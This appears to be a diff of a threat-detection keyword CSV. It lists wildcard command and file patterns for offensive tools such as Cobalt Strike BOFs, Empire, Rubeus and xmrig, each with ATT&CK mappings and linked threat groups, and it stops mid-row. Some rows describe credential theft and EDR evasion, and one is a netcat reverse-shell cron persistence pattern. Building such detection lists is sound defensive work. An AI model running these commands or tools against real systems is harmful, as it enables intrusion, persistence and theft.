T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sniffer -*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,0,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -spawn *.exe *.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -SprayAD * * ,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -SprayAD.exe *,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -ss -lntp*,greyware_tool_keyword,ss,replace netstat command - service listening,T1049 - T1040,TA0007 - 
TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -sudomy -*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,0,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -SwampThing.csproj,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -TokenStrip *,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -token-vault create*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault remove*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault set *,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault show*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault use*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -uselistener http*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -usemodule */*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 
T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -usestager *,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -wapiti -*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z +"keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" +"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* - Sensitive Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"* - ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" 
+"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* */lsass.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"* ./sf.py -l 127.0.0.1:5001*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"* ./tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* .\tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* /.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /bin/nc * -e /bin/bash* > cron && crontab cron*","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - 